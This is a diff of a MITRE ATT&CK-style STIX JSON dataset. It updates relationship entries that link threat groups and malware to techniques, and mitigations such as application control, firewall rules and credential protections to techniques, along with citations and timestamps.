"id": "relationship--1729ebeb-c92c-4d8e-a859-0d081b3821a1",
"type": "relationship",
@@ -138419,11 +139739,11 @@
"source_name": "PWC KeyBoys Feb 2017"
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) installs a service pointing to a malicious DLL dropped to disk.(Citation: PWC KeyBoys Feb 2017)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has installed a service pointing to a malicious DLL dropped to disk.(Citation: PWC KeyBoys Feb 2017)",
"relationship_type": "uses",
"id": "relationship--03fcc016-f9a2-491d-8d9f-92aa4b4c4d4a",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.367Z",
+ "modified": "2020-05-29T03:23:28.167Z",
"created": "2019-06-17T19:35:16.095Z"
},
{
@@ -138957,7 +140277,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
"relationship_type": "mitigates",
- "description": "Identify and block potentially malicious software executed that may be executed through this technique by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Identify and block potentially malicious software executed that may be executed through this technique by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--42f4db8f-ef8b-4dcc-8c8f-4d0b5219c8b7",
"external_references": [
{
@@ -138992,7 +140312,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-15T15:52:05.699Z",
+ "modified": "2020-07-01T16:19:54.904Z",
"created": "2019-06-20T14:28:20.218Z"
},
{
@@ -139427,7 +140747,7 @@
"description": "Patch the BIOS and other firmware as necessary to prevent successful use of known vulnerabilities.",
"id": "relationship--25a84607-970c-474e-83bc-143e2ccbb64b",
"type": "relationship",
- "modified": "2019-07-17T21:23:45.627Z",
+ "modified": "2020-07-14T19:31:46.710Z",
"created": "2019-06-20T15:39:37.667Z"
},
{
@@ -139441,7 +140761,7 @@
"description": "Prevent adversary access to privileged accounts or access necessary to replace system firmware.",
"id": "relationship--b4dafcd2-fed8-4266-b83e-f4033ada0d55",
"type": "relationship",
- "modified": "2019-07-17T21:23:45.639Z",
+ "modified": "2020-07-14T19:31:46.727Z",
"created": "2019-06-20T15:39:37.686Z"
},
{
@@ -139455,7 +140775,7 @@
"description": "Check the integrity of the existing BIOS and device firmware to determine if it is vulnerable to modification.",
"id": "relationship--f365854f-76e6-4746-bab8-2f2b94b50087",
"type": "relationship",
- "modified": "2019-07-17T21:23:45.641Z",
+ "modified": "2020-07-14T19:31:46.725Z",
"created": "2019-06-20T15:39:37.694Z"
},
{
@@ -139490,6 +140810,16 @@
"description": "When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)\n\nDepending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)\n\nAs immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)",
"id": "relationship--52fcde3f-d3af-4785-940f-5856dd657455",
"external_references": [
+ {
+ "source_name": "CERT-EU DDoS March 2017",
+ "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
+ "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019."
+ },
+ {
+ "source_name": "CERT-EU DDoS March 2017",
+ "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
+ "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019."
+ },
{
"source_name": "CERT-EU DDoS March 2017",
"url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
@@ -139497,7 +140827,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T01:11:29.091Z",
+ "modified": "2020-06-01T13:16:33.152Z",
"created": "2019-06-20T15:44:50.969Z"
},
{
@@ -139546,7 +140876,7 @@
"description": "Ensure proper registry permissions are in place to inhibit adversaries from disabling or interfering with critical services.",
"id": "relationship--c00535d0-6e59-4293-8034-70e5bf94a74a",
"type": "relationship",
- "modified": "2019-07-18T19:18:32.970Z",
+ "modified": "2020-07-14T19:34:47.776Z",
"created": "2019-06-20T16:18:23.049Z"
},
{
@@ -139560,7 +140890,7 @@
"description": "Ensure proper process and file permissions are in place to inhibit adversaries from disabling or interfering with critical services.",
"id": "relationship--e28dc4ab-86fe-480e-9f0d-d7fab54c432d",
"type": "relationship",
- "modified": "2019-07-18T19:18:32.968Z",
+ "modified": "2020-07-14T19:34:47.793Z",
"created": "2019-06-20T16:18:23.056Z"
},
{
@@ -139574,7 +140904,7 @@
"description": "Operate intrusion detection, analysis, and response systems on a separate network from the production environment to lessen the chances that an adversary can see and interfere with critical response functions.",
"id": "relationship--40cd458c-5a59-4a8d-a04a-3cd3faebaf66",
"type": "relationship",
- "modified": "2019-07-18T19:18:32.969Z",
+ "modified": "2020-07-14T19:34:47.795Z",
"created": "2019-06-20T16:18:23.058Z"
},
{
@@ -139721,7 +141051,7 @@
"description": "Develop and publish policies that define acceptable information to be stored in repositories.",
"id": "relationship--2ffde834-36f9-463d-93c4-77048f020cf9",
"type": "relationship",
- "modified": "2020-03-24T14:48:47.995Z",
+ "modified": "2020-06-30T22:50:06.270Z",
"created": "2019-06-20T18:55:36.315Z"
},
{
@@ -139735,7 +141065,7 @@
"description": "Consider periodic review of accounts and privileges for critical and sensitive repositories.",
"id": "relationship--eacf09ab-0264-4af8-bfa5-f3be9df47e3f",
"type": "relationship",
- "modified": "2020-03-24T14:48:48.026Z",
+ "modified": "2020-06-30T22:50:06.278Z",
"created": "2019-06-20T18:55:36.343Z"
},
{
@@ -139864,7 +141194,7 @@
"description": "If msxsl.exe is unnecessary, then block its execution to prevent abuse by adversaries.",
"id": "relationship--af393cd2-2a5a-41f8-a1b1-218f30beb4dd",
"type": "relationship",
- "modified": "2020-02-05T14:15:23.264Z",
+ "modified": "2020-06-20T22:45:46.677Z",
"created": "2019-06-21T12:06:48.737Z"
},
{
@@ -140014,7 +141344,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-09T14:52:27.074Z",
+ "modified": "2020-05-13T22:50:51.515Z",
"created": "2019-06-21T13:56:39.436Z"
},
{
@@ -140028,7 +141358,7 @@
"description": "Close all browser sessions regularly and when they are no longer needed.",
"id": "relationship--8d6d88c3-dbfe-492a-8c4c-ee4bfc10bdc3",
"type": "relationship",
- "modified": "2019-07-18T15:36:27.537Z",
+ "modified": "2020-07-14T19:39:44.780Z",
"created": "2019-06-21T13:58:04.205Z"
},
{
@@ -140126,7 +141456,7 @@
}
],
"type": "relationship",
- "modified": "2019-07-17T21:17:03.583Z",
+ "modified": "2020-07-14T19:49:47.589Z",
"created": "2019-06-21T14:29:50.951Z"
},
{
@@ -140154,7 +141484,7 @@
"description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.",
"id": "relationship--3a348ba8-5608-4e9b-a180-f66cfad9896e",
"type": "relationship",
- "modified": "2019-06-21T14:45:42.420Z",
+ "modified": "2020-07-14T19:43:38.276Z",
"created": "2019-06-21T14:45:42.420Z"
},
{
@@ -140224,7 +141554,7 @@
"description": "Network intrusion detection and prevention systems that use network signatures may be able to prevent traffic to remote access services.",
"id": "relationship--d5c70727-794c-4404-b30d-0d798a62ad64",
"type": "relationship",
- "modified": "2020-03-27T18:01:17.924Z",
+ "modified": "2020-06-20T20:42:37.456Z",
"created": "2019-06-21T15:13:50.808Z"
},
{
@@ -140346,7 +141676,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-23T20:59:39.951Z",
+ "modified": "2020-06-20T22:44:36.276Z",
"created": "2019-06-21T16:21:55.301Z"
},
{
@@ -140367,7 +141697,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-23T20:59:39.918Z",
+ "modified": "2020-06-20T22:44:36.303Z",
"created": "2019-06-21T16:21:55.304Z"
},
{
@@ -140406,10 +141736,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
"relationship_type": "mitigates",
- "description": "Application whitelisting may be able to prevent the running of executables masquerading as other files.",
+ "description": "Application control may be able to prevent the running of executables masquerading as other files.",
"id": "relationship--225ab1b4-f800-4a92-9949-a0f05fce6213",
"type": "relationship",
- "modified": "2020-03-11T14:55:31.329Z",
+ "modified": "2020-06-20T20:11:42.519Z",
"created": "2019-06-21T16:28:45.465Z"
},
{
@@ -140451,7 +141781,7 @@
"description": "Properly manage accounts and permissions used by parties in trusted relationships to minimize potential abuse by the party and if the party is compromised by an adversary.",
"id": "relationship--a42398e2-3daa-452a-80f8-f06660328f18",
"type": "relationship",
- "modified": "2019-10-11T15:20:53.996Z",
+ "modified": "2020-07-14T19:38:14.419Z",
"created": "2019-06-21T16:45:15.046Z"
},
{
@@ -140465,7 +141795,7 @@
"description": "Network segmentation can be used to isolate infrastructure components that do not require broad network access.",
"id": "relationship--f0e9a1f7-8600-4558-9d2e-91126c42b126",
"type": "relationship",
- "modified": "2019-10-11T15:20:53.998Z",
+ "modified": "2020-07-14T19:38:14.434Z",
"created": "2019-06-21T16:45:15.071Z"
},
{
@@ -140479,7 +141809,7 @@
"description": "Certain developer utilities should be blocked or restricted if not required.",
"id": "relationship--8c0286e0-036d-4282-9e54-6938c958b7e9",
"type": "relationship",
- "modified": "2020-03-29T19:49:15.926Z",
+ "modified": "2020-06-20T22:43:41.446Z",
"created": "2019-06-21T16:52:53.737Z"
},
{
@@ -140493,7 +141823,7 @@
"description": "Specific developer utilities may not be necessary within a given environment and should be removed if not used.",
"id": "relationship--f4e83a18-a2bf-45af-aa6b-18f72646d8b6",
"type": "relationship",
- "modified": "2020-03-29T19:49:15.928Z",
+ "modified": "2020-06-20T22:43:41.455Z",
"created": "2019-06-21T16:52:53.740Z"
},
{
@@ -140647,7 +141977,7 @@
"description": "Protect shared folders by minimizing users who have write access.",
"id": "relationship--ecf9df35-e4f5-4041-a65d-0e897e5435b0",
"type": "relationship",
- "modified": "2020-02-12T20:27:07.919Z",
+ "modified": "2020-03-31T22:14:56.186Z",
"created": "2019-06-21T17:38:45.794Z"
},
{
@@ -140661,7 +141991,7 @@
"description": "Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).",
"id": "relationship--f66af3ae-266c-4aa1-a6b4-f1ff87aff601",
"type": "relationship",
- "modified": "2020-02-12T20:27:07.918Z",
+ "modified": "2020-03-31T22:14:56.209Z",
"created": "2019-06-21T17:38:45.809Z"
},
{
@@ -140672,7 +142002,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
"relationship_type": "mitigates",
- "description": "Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using application control (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--b0831323-de94-498a-8338-c60778bef95f",
"external_references": [
{
@@ -140702,7 +142032,7 @@
}
],
"type": "relationship",
- "modified": "2020-02-12T20:27:07.935Z",
+ "modified": "2020-06-20T20:11:42.543Z",
"created": "2019-06-21T17:38:45.822Z"
},
{
@@ -140811,17 +142141,17 @@
"source_ref": "course-of-action--15437c6d-b998-4a36-be41-4ace3d54d266",
"target_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7",
"relationship_type": "mitigates",
- "description": "Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well. (Citation: OWASP Top 10 2017)",
+ "description": "Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well.(Citation: OWASP Top 10)",
"id": "relationship--d5be72df-7267-4524-85fa-a497a0cd8052",
"external_references": [
{
- "source_name": "OWASP Top 10 2017",
- "url": "https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf",
- "description": "OWASP. (2017, April 16). OWASP Top 10 2017 - The Ten Most Critical Web Application Security Risks. Retrieved February 12, 2019."
+ "url": "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project",
+ "description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.",
+ "source_name": "OWASP Top 10"
}
],
"type": "relationship",
- "modified": "2020-03-11T14:19:57.049Z",
+ "modified": "2020-07-14T22:22:06.434Z",
"created": "2019-06-21T18:37:11.945Z"
},
{
@@ -141133,10 +142463,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe",
"relationship_type": "mitigates",
- "description": "Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application control configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--54d2ea67-40fd-4fbc-b76a-01879aa5bff5",
"type": "relationship",
- "modified": "2020-03-29T19:34:19.724Z",
+ "modified": "2020-06-20T22:39:47.681Z",
"created": "2019-06-24T11:33:53.013Z"
},
{
@@ -141228,7 +142558,7 @@
"description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level.",
"id": "relationship--a0a004fe-2636-4f6d-85c7-2401768252a2",
"type": "relationship",
- "modified": "2019-06-24T12:03:02.500Z",
+ "modified": "2020-07-14T19:47:47.062Z",
"created": "2019-06-24T12:03:02.500Z"
},
{
@@ -141249,7 +142579,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-15T15:37:58.049Z",
+ "modified": "2020-05-14T13:05:39.706Z",
"created": "2019-06-24T12:06:10.358Z"
},
{
@@ -142702,7 +144032,7 @@
}
],
"type": "relationship",
- "modified": "2019-07-18T17:52:28.573Z",
+ "modified": "2020-07-14T19:45:59.779Z",
"created": "2019-06-24T16:07:33.575Z"
},
{
@@ -142805,9 +144135,9 @@
"target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
@@ -142819,7 +144149,7 @@
"relationship_type": "uses",
"id": "relationship--0d4d7376-5bda-44bc-b90d-0a065bb99433",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.561Z",
+ "modified": "2020-06-02T16:14:00.473Z",
"created": "2019-06-24T17:08:51.561Z"
},
{
@@ -142886,10 +144216,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
"relationship_type": "mitigates",
- "description": "Use application whitelisting where appropriate.",
+ "description": "Use application control where appropriate.",
"id": "relationship--87fd0088-41da-47ac-bd69-a8ac151a0d39",
"type": "relationship",
- "modified": "2020-03-28T16:19:45.895Z",
+ "modified": "2020-06-25T03:19:34.222Z",
"created": "2019-06-24T18:00:41.676Z"
},
{
@@ -143239,7 +144569,7 @@
"source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
"target_ref": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2",
"relationship_type": "mitigates",
- "description": "\nBlock SMB traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139, 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, then traffic should be tightly limited with whitelisting. (Citation: US-CERT SMB Security) (Citation: US-CERT APT Energy Oct 2017)",
+ "description": "\nBlock SMB traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139, 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, then traffic should be tightly limited with allowlisting. (Citation: US-CERT SMB Security) (Citation: US-CERT APT Energy Oct 2017)",
"id": "relationship--85c9285a-6738-42dd-aa12-fbded3e7bbdb",
"external_references": [
{
@@ -143254,7 +144584,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T20:32:06.054Z",
+ "modified": "2020-06-20T20:46:36.547Z",
"created": "2019-06-24T19:53:23.769Z"
},
{
@@ -143408,7 +144738,7 @@
"description": "Require that all executables be placed in write-protected directories.",
"id": "relationship--458eb231-ded2-4941-aeaa-875263ac20ab",
"type": "relationship",
- "modified": "2020-03-30T13:45:24.482Z",
+ "modified": "2020-07-06T18:49:35.885Z",
"created": "2019-06-25T12:02:27.819Z"
},
{
@@ -143419,7 +144749,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02",
"relationship_type": "mitigates",
- "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Adversaries will likely need to place new binaries in locations to be executed through this weakness. Identify and block potentially malicious software executed path interception by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--cef9c309-edd5-48a6-afc9-de7e13a0cc05",
"external_references": [
{
@@ -143454,7 +144784,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-30T13:45:24.513Z",
+ "modified": "2020-07-06T18:49:35.924Z",
"created": "2019-06-25T12:02:27.823Z"
},
{
@@ -143485,7 +144815,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-30T13:45:24.496Z",
+ "modified": "2020-07-06T18:49:35.975Z",
"created": "2019-06-25T12:02:27.825Z"
},
{
@@ -143527,7 +144857,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T20:43:54.739Z",
+ "modified": "2020-06-20T22:14:08.576Z",
"created": "2019-06-25T12:15:00.109Z"
},
{
@@ -143646,7 +144976,7 @@
"description": "Use file system access controls to protect folders such as C:\\\\Windows\\\\System32.",
"id": "relationship--72de6e56-e5d1-4a3f-aa85-d7155f7ff42c",
"type": "relationship",
- "modified": "2020-03-29T20:10:19.399Z",
+ "modified": "2020-07-09T13:54:28.922Z",
"created": "2019-06-25T12:37:30.052Z"
},
{
@@ -143660,7 +144990,7 @@
"description": "Require signed binaries.",
"id": "relationship--4fd3ec25-00ed-48c1-af72-e2523959860e",
"type": "relationship",
- "modified": "2020-03-29T20:10:19.430Z",
+ "modified": "2020-07-09T13:54:28.910Z",
"created": "2019-06-25T12:37:30.078Z"
},
{
@@ -144095,7 +145425,7 @@
"description": "Block unknown devices and accessories by endpoint security configuration and monitoring agent.",
"id": "relationship--b28f8635-6a79-4be1-b05a-b4356a04e7c2",
"type": "relationship",
- "modified": "2019-07-17T21:35:07.124Z",
+ "modified": "2020-07-14T19:36:40.746Z",
"created": "2019-06-25T14:33:33.684Z"
},
{
@@ -144116,7 +145446,7 @@
}
],
"type": "relationship",
- "modified": "2019-07-17T21:35:07.133Z",
+ "modified": "2020-07-14T19:36:40.741Z",
"created": "2019-06-25T14:33:33.700Z"
},
{
@@ -144165,7 +145495,7 @@
"description": "Train users to identify social engineering techniques and spearphishing emails.",
"id": "relationship--b2dac45d-0bd8-488a-a00d-d54db8d3507c",
"type": "relationship",
- "modified": "2020-03-29T23:32:53.644Z",
+ "modified": "2020-04-29T14:37:59.738Z",
"created": "2019-06-25T15:34:24.671Z"
},
{
@@ -144186,7 +145516,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T23:32:53.660Z",
+ "modified": "2020-04-29T14:37:59.777Z",
"created": "2019-06-25T15:34:24.696Z"
},
{
@@ -144207,7 +145537,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T23:32:53.673Z",
+ "modified": "2020-04-29T14:37:59.775Z",
"created": "2019-06-25T15:34:24.698Z"
},
{
@@ -144228,7 +145558,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T23:32:53.671Z",
+ "modified": "2020-04-29T14:37:59.773Z",
"created": "2019-06-25T15:34:24.702Z"
},
{
@@ -144980,7 +146310,7 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
}
],
- "description": "[Yahoyah](https://attack.mitre.org/software/S0388) uses HTTP for C2.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) uses HTTP for C2.(Citation: TrendMicro TropicTrooper 2015)",
"relationship_type": "uses",
"id": "relationship--78e60e86-72a0-4966-a1b9-19a76102d78f",
"type": "relationship",
@@ -145188,13 +146518,18 @@
"source_name": "Symantec Waterbug Jun 2019",
"url": "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments",
"description": "Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019."
+ },
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
}
],
- "description": "[Turla](https://attack.mitre.org/groups/G0010) has used WebDAV to upload stolen USB files to a cloud drive.(Citation: Symantec Waterbug Jun 2019)",
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used WebDAV to upload stolen USB files to a cloud drive.(Citation: Symantec Waterbug Jun 2019) [Turla](https://attack.mitre.org/groups/G0010) has also exfiltrated stolen files to OneDrive and 4shared.(Citation: ESET ComRAT May 2020)",
"relationship_type": "uses",
"id": "relationship--7dda2468-0344-48c5-8843-6655084d8159",
"type": "relationship",
- "modified": "2020-03-11T17:38:56.598Z",
+ "modified": "2020-06-29T03:35:29.737Z",
"created": "2019-07-08T15:24:24.657Z"
},
{
@@ -145379,11 +146714,11 @@
"source_name": "Unit42 Emissary Panda May 2019"
}
],
- "description": "[HyperBro](https://attack.mitre.org/software/S0398) has the ability to run an application (CreateProcessW) or script/file (ShellExecuteW) via API.(Citation: Unit42 Emissary Panda May 2019)",
+ "description": "[HyperBro](https://attack.mitre.org/software/S0398) has the ability to run an application (CreateProcessW) or script/file (ShellExecuteW) via API.(Citation: Unit42 Emissary Panda May 2019)",
"relationship_type": "uses",
"id": "relationship--bc8cb83f-fc66-4c44-8d60-f6f4be4b4f41",
"type": "relationship",
- "modified": "2019-07-14T21:14:18.883Z",
+ "modified": "2020-06-23T00:20:31.885Z",
"created": "2019-07-09T17:42:44.984Z"
},
{
@@ -145585,27 +146920,6 @@
"modified": "2019-07-14T21:15:55.673Z",
"created": "2019-07-09T17:54:21.445Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12",
- "target_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878",
- "external_references": [
- {
- "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf",
- "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.",
- "source_name": "Lookout Dark Caracal Jan 2018"
- }
- ],
- "description": "(Citation: Lookout Dark Caracal Jan 2018)",
- "relationship_type": "uses",
- "id": "relationship--53364899-1ea5-47fa-afde-c210aed64120",
- "type": "relationship",
- "modified": "2019-07-16T15:35:21.086Z",
- "created": "2019-07-10T15:47:19.659Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -145951,7 +147265,7 @@
"description": "Configure internal and external firewalls to block traffic using common ports that associate to network protocols that may be unnecessary for that particular network segment.",
"id": "relationship--205b99bf-ce60-4bb5-8916-ac9d97ce4d05",
"type": "relationship",
- "modified": "2020-03-14T18:19:15.025Z",
+ "modified": "2020-07-06T17:54:28.241Z",
"created": "2019-07-16T20:51:40.453Z"
},
{
@@ -145972,7 +147286,7 @@
}
],
"type": "relationship",
- "modified": "2019-10-25T15:27:57.980Z",
+ "modified": "2020-07-14T19:44:51.001Z",
"created": "2019-07-16T20:53:20.687Z"
},
{
@@ -146088,7 +147402,7 @@
"description": "Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.",
"id": "relationship--7e8ca453-aee5-48c1-a891-f44a742a95ed",
"type": "relationship",
- "modified": "2020-03-25T16:25:17.403Z",
+ "modified": "2020-06-09T20:44:40.882Z",
"created": "2019-07-17T15:45:37.493Z"
},
{
@@ -146099,7 +147413,7 @@
"source_ref": "course-of-action--e3388c78-2a8d-47c2-8422-c1398b324462",
"target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
"relationship_type": "mitigates",
- "description": "\nManage the access control list for \u201cReplicating Directory Changes\u201d and other permissions associated with domain controller replication. (Citation: AdSecurity DCSync Sept 2015) (Citation: Microsoft Replication ACL)",
+ "description": "\nManage the access control list for \u201cReplicating Directory Changes\u201d and other permissions associated with domain controller replication. (Citation: AdSecurity DCSync Sept 2015) (Citation: Microsoft Replication ACL) Consider adding users to the \"Protected Users\" Active Directory security group. This can help limit the caching of users' plaintext credentials.(Citation: Microsoft Protected Users Security Group)",
"id": "relationship--fc31837d-530f-45e5-b9f8-bf6268c3ef03",
"external_references": [
{
@@ -146111,10 +147425,15 @@
"url": "https://support.microsoft.com/help/303972/how-to-grant-the-replicating-directory-changes-permission-for-the-micr",
"description": "Microsoft. (n.d.). How to grant the \"Replicating Directory Changes\" permission for the Microsoft Metadirectory Services ADMA service account. Retrieved December 4, 2017.",
"source_name": "Microsoft Replication ACL"
+ },
+ {
+ "source_name": "Microsoft Protected Users Security Group",
+ "url": "https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group",
+ "description": "Microsoft. (2016, October 12). Protected Users Security Group. Retrieved May 29, 2020."
}
],
"type": "relationship",
- "modified": "2020-03-25T16:25:17.471Z",
+ "modified": "2020-06-09T20:44:40.883Z",
"created": "2019-07-17T15:45:37.521Z"
},
{
@@ -146135,7 +147454,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T16:25:17.473Z",
+ "modified": "2020-06-09T20:44:40.887Z",
"created": "2019-07-17T15:45:37.529Z"
},
{
@@ -146146,17 +147465,22 @@
"source_ref": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3",
"target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
"relationship_type": "mitigates",
- "description": "\nConsider disabling or restricting NTLM. (Citation: Microsoft Disable NTLM Nov 2012)",
+ "description": "\nConsider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012) Consider disabling WDigest authentication.(Citation: Microsoft WDigest Mit)",
"id": "relationship--fe849763-78b9-4b8a-9219-2781ac7b00e8",
"external_references": [
{
"url": "https://technet.microsoft.com/library/jj865668.aspx",
"description": "Microsoft. (2012, November 29). Using security policies to restrict NTLM traffic. Retrieved December 4, 2017.",
"source_name": "Microsoft Disable NTLM Nov 2012"
+ },
+ {
+ "source_name": "Microsoft WDigest Mit",
